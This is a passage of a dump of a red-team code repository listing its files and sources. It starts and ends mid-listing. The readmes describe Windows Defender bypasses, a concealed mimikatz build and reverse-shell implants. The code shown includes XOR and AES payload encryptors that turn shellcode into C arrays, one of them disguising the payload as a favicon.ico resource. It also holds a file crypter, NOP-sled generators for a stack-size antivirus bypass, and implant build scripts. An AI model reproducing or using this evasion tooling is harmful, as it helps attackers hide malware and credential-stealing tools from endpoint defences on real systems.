8 | ZeroMemory(&si, sizeof(si)); //ZERO OUT THE MEMORY TO ENSURE THERE IS NO DATA IN THE REGION PRIOR TO USE
9 |
10 | PROCESS_INFORMATION pi;
11 | ZeroMemory(&pi, sizeof(pi));//ZERO THIS OUT TOO
12 | //NOW WE'RE READY TO CALL CREATE PROCESS
13 |
14 | BOOL success = CreateProcess(
15 | "C:\\Windows\\System32\\notepad.exe",
16 | NULL,
17 | 0,
18 | 0,
19 | FALSE,
20 | 0,
21 | NULL,
22 | "C:\\Windows\\System32",
23 | &si,
24 | &pi);
25 |
26 | if (success){
27 | printf("Process created with PID: %d\n",pi.dwProcessId);
28 | return 0;
29 |
30 | }else{
31 | printf("Failed to create process. Error code: %d\n", GetLastError());
32 | return 1;
33 | }
34 |
35 | }
--------------------------------------------------------------------------------
/Cpp/create_process/CreateProcess.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/create_process/CreateProcess.exe
--------------------------------------------------------------------------------
/Cpp/create_process/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Cpp/crypter/compile.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 |
3 | cl.exe /nologo /Od /MT /W0 /GS- /DNDEBUG /Tpmain.cpp /EHsc /link /OUT:crypter.exe /SUBSYSTEM:CONSOLE /MACHINE:x64
--------------------------------------------------------------------------------
/Cpp/crypter/crypter.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/crypter/crypter.exe
--------------------------------------------------------------------------------
/Cpp/crypter/main.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 |
4 | int main(int argc, char* argv[]) {
5 | // Check if enough arguments were passed
6 | if (argc < 3) {
7 | std::cerr << "Usage: " << argv[0] << " " << std::endl;
8 | return 1;
9 | }
10 |
11 | // Open the input file
12 | std::ifstream input_file(argv[1], std::ios::binary);
13 | if (!input_file) {
14 | std::cerr << "Error: Could not open input file " << argv[1] << std::endl;
15 | return 1;
16 | }
17 |
18 | // Open the output file
19 | std::ofstream output_file(argv[2], std::ios::binary);
20 | if (!output_file) {
21 | std::cerr << "Error: Could not open output file " << argv[2] << std::endl;
22 | return 1;
23 | }
24 |
25 | // Encrypt the file
26 | char key = 'K'; // Key used for XOR encryption
27 | char buffer;
28 | while (input_file.read(&buffer, 1)) {
29 | buffer ^= key;
30 | output_file.write(&buffer, 1);
31 | }
32 |
33 | // Close the input and output files
34 | input_file.close();
35 | output_file.close();
36 |
37 | return 0;
38 | }
--------------------------------------------------------------------------------
/Cpp/crypter/main.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/crypter/main.obj
--------------------------------------------------------------------------------
/Cpp/crypter/out.txt:
--------------------------------------------------------------------------------
1 | ?.8?
--------------------------------------------------------------------------------
/Cpp/crypter/test.txt:
--------------------------------------------------------------------------------
1 | test
--------------------------------------------------------------------------------
/Cpp/deceiving_defender/BigStackBypass/build_the_sleigh.py:
--------------------------------------------------------------------------------
1 | print '0x90, ' * 1024000
--------------------------------------------------------------------------------
/Cpp/deceiving_defender/BigStackBypass/compile.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 |
3 | cl.exe /nologo /Od /MT /W0 /GS /std:c++20 /DNDEBUG /Tpimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 /STACK:3000000000
--------------------------------------------------------------------------------
/Cpp/deceiving_defender/BigStackBypass/implant.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/deceiving_defender/BigStackBypass/implant.exe
--------------------------------------------------------------------------------
/Cpp/deceiving_defender/BigStackBypass/meterpreter/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Cpp/deceiving_defender/BigStackBypass/meterpreter/beautify.py:
--------------------------------------------------------------------------------
1 | import sys
2 |
3 | try:
4 | plaintext = open(sys.argv[1], "rb").read()
5 | except:
6 | print("File argument needed! %s " % sys.argv[0])
7 | sys.exit()
8 |
9 |
10 | #open("payload.out",'wb').write(plaintext)
11 | print('unsigned char payload[] = { 0x' + ', 0x'.join(hex(ord(x))[2:] for x in plaintext) + ' };')
--------------------------------------------------------------------------------
/Cpp/deceiving_defender/BigStackBypass/meterpreter/build_the_sleigh.py:
--------------------------------------------------------------------------------
1 | print '0x90, ' * 2048000
--------------------------------------------------------------------------------
/Cpp/deceiving_defender/BigStackBypass/meterpreter/compile.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 |
3 | cl.exe /nologo /Od /MT /W0 /GS /std:c++20 /DNDEBUG /Tpimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 /STACK:300000000
--------------------------------------------------------------------------------
/Cpp/deceiving_defender/BigStackBypass/vt-results-2022-12-28.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/deceiving_defender/BigStackBypass/vt-results-2022-12-28.png
--------------------------------------------------------------------------------
/Cpp/deceiving_defender/BigStackBypass/vt_results.txt:
--------------------------------------------------------------------------------
1 | https://www.virustotal.com/gui/file-analysis/OGY3Y2M5M2ZjNDkwZDZkZGMxN2Y2N2EyZmIzNDlhMjQ6MTY3MjI4NTY3Nw==
--------------------------------------------------------------------------------
/Cpp/deceiving_defender/BigStackBypass/windows-wallpaper.jpg:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/deceiving_defender/BigStackBypass/windows-wallpaper.jpg
--------------------------------------------------------------------------------
/Cpp/deceiving_defender/Readme.md:
--------------------------------------------------------------------------------
1 | Collection of code snippets used to bypass Windows Defender's protections.
2 |
--------------------------------------------------------------------------------
/Cpp/deceiving_defender/name_bypass/Readme.md:
--------------------------------------------------------------------------------
1 | Using a simple name check to bypass Windows Defender.
2 |
3 |
--------------------------------------------------------------------------------
/Cpp/deceiving_defender/name_bypass/compile.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 |
3 | cl.exe /nologo /Od /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64
--------------------------------------------------------------------------------
/Cpp/deceiving_defender/name_bypass/implant.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/deceiving_defender/name_bypass/implant.exe
--------------------------------------------------------------------------------
/Cpp/deceiving_defender/one/compile.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 |
3 | cl.exe /nologo /Od /MT /W0 /GS- /DNDEBUG /Tcimplant.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64
--------------------------------------------------------------------------------
/Cpp/deceiving_defender/one/implant.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/deceiving_defender/one/implant.exe
--------------------------------------------------------------------------------
/Cpp/deceiving_defender/one/implant.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/deceiving_defender/one/implant.obj
--------------------------------------------------------------------------------
/Cpp/embedding_payloads/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Cpp/embedding_payloads/x64/calc_x64.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x64/calc_x64.bin
--------------------------------------------------------------------------------
/Cpp/embedding_payloads/x64/compile.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 |
3 | x86_64-w64-mingw32-g++ good.cpp -o good_x64.exe -Wl,-subsystem,windows
--------------------------------------------------------------------------------
/Cpp/embedding_payloads/x64/even_better_x64.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x64/even_better_x64.exe
--------------------------------------------------------------------------------
/Cpp/embedding_payloads/x64/even_better_x64_PATCHED.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x64/even_better_x64_PATCHED.exe
--------------------------------------------------------------------------------
/Cpp/embedding_payloads/x64/even_better_x64_PATCHED_goto_MAIN.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x64/even_better_x64_PATCHED_goto_MAIN.exe
--------------------------------------------------------------------------------
/Cpp/embedding_payloads/x64/even_better_x64_reloc.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x64/even_better_x64_reloc.exe
--------------------------------------------------------------------------------
/Cpp/embedding_payloads/x64/good.cpp:
--------------------------------------------------------------------------------
1 | /*
2 | * By 0xTriboulet
3 | * "good.exe" program
4 | * 12/31/22
5 | * compile with: x86_64-w64-mingw32-g++ good.cpp -o good_x64.exe -Wl,-subsystem,windows
6 | */
7 |
8 | #include
9 | #include
10 |
11 | #pragma comment(lib, "user32.lib")
12 | #pragma comment(lib, "kernel32.lib")
13 |
14 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
15 | LPSTR lpCmdLine, int nCmdShow) {
16 | MessageBox(NULL, "This is a safe program!", "Safe!", 0x0);
17 | return 0;
18 | }
19 |
--------------------------------------------------------------------------------
/Cpp/embedding_payloads/x64/good_x64.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x64/good_x64.exe
--------------------------------------------------------------------------------
/Cpp/embedding_payloads/x64/test.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
5 | int main(VOID){
6 | getchar();
7 | //__debugbreak();
8 | FARPROC a = GetProcAddress(LoadLibraryA("kernel32"),"CreateThread");
9 | //__debugbreak();
10 | printf("address %p\n:", a);
11 | printf("Success!\n");
12 | return 0;
13 | }
--------------------------------------------------------------------------------
/Cpp/embedding_payloads/x86/calc_payload_32.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x86/calc_payload_32.bin
--------------------------------------------------------------------------------
/Cpp/embedding_payloads/x86/compile.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 |
3 | i686-w64-mingw32-g++ good.cpp -o good.exe -Wl,-subsystem,windows
--------------------------------------------------------------------------------
/Cpp/embedding_payloads/x86/even_better.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x86/even_better.exe
--------------------------------------------------------------------------------
/Cpp/embedding_payloads/x86/even_better_ansi.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x86/even_better_ansi.exe
--------------------------------------------------------------------------------
/Cpp/embedding_payloads/x86/good.cpp:
--------------------------------------------------------------------------------
1 | /*
2 | * By 0xTriboulet
3 | * "good.exe" program
4 | * 12/31/22
5 | * compile with: i686-w64-mingw32-g++ good.cpp -o good.exe -Wl,-subsystem,windows -ansi
6 | */
7 |
8 | #include
9 | #include
10 |
11 | #pragma comment(lib, "user32.lib")
12 |
13 | int WINAPI WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance,
14 | LPSTR lpCmdLine, int nCmdShow) {
15 | MessageBox(NULL, "This is a safe program!", "Safe!", 0x0);
16 | return 0;
17 | }
18 |
--------------------------------------------------------------------------------
/Cpp/embedding_payloads/x86/good.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x86/good.exe
--------------------------------------------------------------------------------
/Cpp/embedding_payloads/x86/good.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x86/good.obj
--------------------------------------------------------------------------------
/Cpp/embedding_payloads/x86/good_no_names.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x86/good_no_names.exe
--------------------------------------------------------------------------------
/Cpp/embedding_payloads/x86/good_w_names.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/embedding_payloads/x86/good_w_names.exe
--------------------------------------------------------------------------------
/Cpp/hidden_mimikatz/Readme.md:
--------------------------------------------------------------------------------
1 | All the source and binaries used to develop a survivable mimikatz executable
2 |
--------------------------------------------------------------------------------
/Cpp/hidden_mimikatz/mimikatz.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/hidden_mimikatz/mimikatz.exe
--------------------------------------------------------------------------------
/Cpp/hidden_mimikatz/wrapper/aesencrypt.py:
--------------------------------------------------------------------------------
1 | # Red Team Operator course code template
2 | # payload encryption with AES
3 | #
4 | # author: reenz0h (twitter: @sektor7net)
5 |
6 | import sys
7 | from Crypto.Cipher import AES
8 | from os import urandom
9 | import hashlib
10 |
11 | KEY = urandom(16)
12 |
13 | def pad(s):
14 | return s + (AES.block_size - len(s) % AES.block_size) * chr(AES.block_size - len(s) % AES.block_size)
15 |
16 | def aesenc(plaintext, key):
17 |
18 | k = hashlib.sha256(key).digest()
19 | iv = 16 * '\x00'
20 | plaintext = pad(plaintext)
21 | cipher = AES.new(k, AES.MODE_CBC, iv)
22 |
23 | return cipher.encrypt(bytes(plaintext))
24 |
25 |
26 | try:
27 | plaintext = open(sys.argv[1], "rb").read()
28 | except:
29 | print("File argument needed! %s " % sys.argv[0])
30 | sys.exit()
31 |
32 | ciphertext = aesenc(plaintext, KEY)
33 | open("favicon.ico",'wb').write(ciphertext)
34 | print('payload[] = { 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')
35 | print('AESkey[] = { 0x' + ', 0x'.join(hex(ord(x))[2:] for x in KEY) + ' };')
36 |
37 |
--------------------------------------------------------------------------------
/Cpp/hidden_mimikatz/wrapper/compile.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 |
3 | rc resources.rc
4 | cvtres /MACHINE:x64 /OUT:resources.o resources.res
5 |
6 | cl.exe /nologo /Od /MT /W0 /GS- /DNDEBUG /Tcmimikatz.cpp /link /OUT:mimikatz.exe /SUBSYSTEM:CONSOLE /MACHINE:x64 resources.o
--------------------------------------------------------------------------------
/Cpp/hidden_mimikatz/wrapper/favicon.ico:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/hidden_mimikatz/wrapper/favicon.ico
--------------------------------------------------------------------------------
/Cpp/hidden_mimikatz/wrapper/mimikatz.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/hidden_mimikatz/wrapper/mimikatz.exe
--------------------------------------------------------------------------------
/Cpp/hidden_mimikatz/wrapper/mimikatz.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/hidden_mimikatz/wrapper/mimikatz.obj
--------------------------------------------------------------------------------
/Cpp/hidden_mimikatz/wrapper/resources.h:
--------------------------------------------------------------------------------
1 | #define FAVICON_ICO 100
2 |
--------------------------------------------------------------------------------
/Cpp/hidden_mimikatz/wrapper/resources.o:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/hidden_mimikatz/wrapper/resources.o
--------------------------------------------------------------------------------
/Cpp/hidden_mimikatz/wrapper/resources.rc:
--------------------------------------------------------------------------------
1 | #include "resources.h"
2 |
3 | FAVICON_ICO RCDATA favicon.ico
4 |
--------------------------------------------------------------------------------
/Cpp/hidden_mimikatz/wrapper/resources.res:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/hidden_mimikatz/wrapper/resources.res
--------------------------------------------------------------------------------
/Cpp/hidden_mimikatz/wrapper/shellcode.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/hidden_mimikatz/wrapper/shellcode.bin
--------------------------------------------------------------------------------
/Cpp/making_malware/Readme.md:
--------------------------------------------------------------------------------
1 | Source and binaries for achieving reverse shells on modern Windows systems.
2 |
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv1/beautify.py:
--------------------------------------------------------------------------------
1 | import sys
2 |
3 |
4 |
5 | try:
6 | plaintext = open(sys.argv[1], "rb").read()
7 | except:
8 | print("File argument needed! %s " % sys.argv[0])
9 | sys.exit()
10 |
11 |
12 | open("payload.out",'wb').write(plaintext)
13 | print('unsigned char payload[] = { 0x' + ', 0x'.join(hex(ord(x))[2:] for x in plaintext) + ' };')
14 |
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv1/compile.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 |
3 | cl.exe /nologo /Od /MT /W2 /GS- /DNDEBUG /Tpimplantv1.cpp /link /OUT:implantv1.exe /SUBSYSTEM:CONSOLE /MACHINE:x64
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv1/implant.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv1/implant.obj
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv1/implantv1.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv1/implantv1.exe
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv1/implantv1.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv1/implantv1.obj
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv1/xorencrypt.py:
--------------------------------------------------------------------------------
1 | # Red Team Operator course code template
2 | # payload encryption with XOR
3 | #
4 | # author: reenz0h (twitter: @sektor7net)
5 |
6 | import sys
7 |
8 | KEY = "WindowsSystem32"
9 |
10 | def xor(data, key):
11 |
12 | key = str(key)
13 | l = len(key)
14 | output_str = ""
15 |
16 | for i in range(len(data)):
17 | current = data[i]
18 | current_key = key[i % len(key)]
19 | output_str += chr(ord(current) ^ ord(current_key))
20 |
21 | return output_str
22 |
23 | def printCiphertext(ciphertext):
24 | print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')
25 |
26 |
27 |
28 | try:
29 | plaintext = open(sys.argv[1], "rb").read()
30 | except:
31 | print("File argument needed! %s " % sys.argv[0])
32 | sys.exit()
33 |
34 |
35 | ciphertext = xor(plaintext, KEY)
36 | open("payload.out",'wb').write(ciphertext)
37 | print("unsigned char payload[] = ")
38 | print('{ 0x' + ', 0x'.join(hex(ord(x))[2:] for x in ciphertext) + ' };')
39 |
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv2/compile.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 |
3 | cl.exe /nologo /Od /MT /W0 /GS- /DNDEBUG /Tpimplantv2.cpp /link /OUT:implant.exe /SUBSYSTEM:CONSOLE /MACHINE:x64
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv2/implant.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/implant.exe
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv2/implantv2.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/implantv2.obj
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv2/reverseDLL.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/reverseDLL.bin
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv2/reverseDLL.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/reverseDLL.txt
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv2/reverseDLL/Python/ShellcodeRDI.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/reverseDLL/Python/ShellcodeRDI.pyc
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv2/reverseDLL/Python/__pycache__/ShellcodeRDI.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/reverseDLL/Python/__pycache__/ShellcodeRDI.cpython-311.pyc
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv2/reverseDLL/Python/__pycache__/ShellcodeRDI.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/reverseDLL/Python/__pycache__/ShellcodeRDI.cpython-38.pyc
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv2/reverseDLL/Python/reverseDLL.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/reverseDLL/Python/reverseDLL.txt
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv2/reverseDLL/compileDLL.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 |
3 | cl.exe /W1 /D_USRDLL /D_CRT_SECURE_NO_WARNINGS /D_WINDLL *.cpp /MT /link /DLL /OUT:reverse.dll
4 | echo Cleaning up...
5 | del *.obj *.lib *.exp
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv2/reverseDLL/reverse.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/reverseDLL/reverse.bin
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv2/reverseDLL/reverse.dll:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/reverseDLL/reverse.dll
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv2/reverseDLL/reverseDLL.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv2/reverseDLL/reverseDLL.bin
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv3/Readme.md:
--------------------------------------------------------------------------------
1 | Implantv3 Main.cpp
2 |
3 | For VX-API check out:
4 | https://github.com/vxunderground/VX-API
5 |
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv3/x64/Release/implant.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv3/x64/Release/implant.exe
--------------------------------------------------------------------------------
/Cpp/making_malware/implantv3/x64/Release/implantv3.pdb:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/implantv3/x64/Release/implantv3.pdb
--------------------------------------------------------------------------------
/Cpp/making_malware/misc/mm#2/Readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Cpp/making_malware/misc/readme.md:
--------------------------------------------------------------------------------
1 |
2 |
--------------------------------------------------------------------------------
/Cpp/making_malware/revshell/beautify.py:
--------------------------------------------------------------------------------
1 | import sys
2 |
3 | try:
4 | plaintext = open(sys.argv[1], "rb").read()
5 | except:
6 | print("File argument needed! %s " % sys.argv[0])
7 | sys.exit()
8 |
9 |
10 | open("payload.out",'wb').write(plaintext)
11 | print('unsigned char payload[] = { 0x' + ', 0x'.join(hex(ord(x))[2:] for x in plaintext) + ' };')
12 |
--------------------------------------------------------------------------------
/Cpp/making_malware/revshell/compile.bat:
--------------------------------------------------------------------------------
1 | @ECHO OFF
2 |
3 | cl.exe /nologo /Od /MT /W0 /GS- /DNDEBUG /Tpreverse.cpp /link /OUT:reverse.exe /SUBSYSTEM:CONSOLE /MACHINE:x64
--------------------------------------------------------------------------------
/Cpp/making_malware/revshell/payload.out:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/payload.out
--------------------------------------------------------------------------------
/Cpp/making_malware/revshell/reverse.exe:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverse.exe
--------------------------------------------------------------------------------
/Cpp/making_malware/revshell/reverse.obj:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverse.obj
--------------------------------------------------------------------------------
/Cpp/making_malware/revshell/reverseDLL.bin:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverseDLL.bin
--------------------------------------------------------------------------------
/Cpp/making_malware/revshell/reverseDLL.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverseDLL.txt
--------------------------------------------------------------------------------
/Cpp/making_malware/revshell/reverseDLL/Python/ShellcodeRDI.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverseDLL/Python/ShellcodeRDI.pyc
--------------------------------------------------------------------------------
/Cpp/making_malware/revshell/reverseDLL/Python/__pycache__/ShellcodeRDI.cpython-311.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverseDLL/Python/__pycache__/ShellcodeRDI.cpython-311.pyc
--------------------------------------------------------------------------------
/Cpp/making_malware/revshell/reverseDLL/Python/__pycache__/ShellcodeRDI.cpython-38.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverseDLL/Python/__pycache__/ShellcodeRDI.cpython-38.pyc
--------------------------------------------------------------------------------
/Cpp/making_malware/revshell/reverseDLL/Python/reverseDLL.txt:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/0xTriboulet/Red_Team_Code_Snippets/87682579ddb541c1a4e31df72150fce8b3feba91/Cpp/making_malware/revshell/reverseDLL/Python/reverseDLL.txt
--------------------------------------------------------------------------------
/Cpp/making_malware/revshell/reverseDLL/compileDLL.bat:
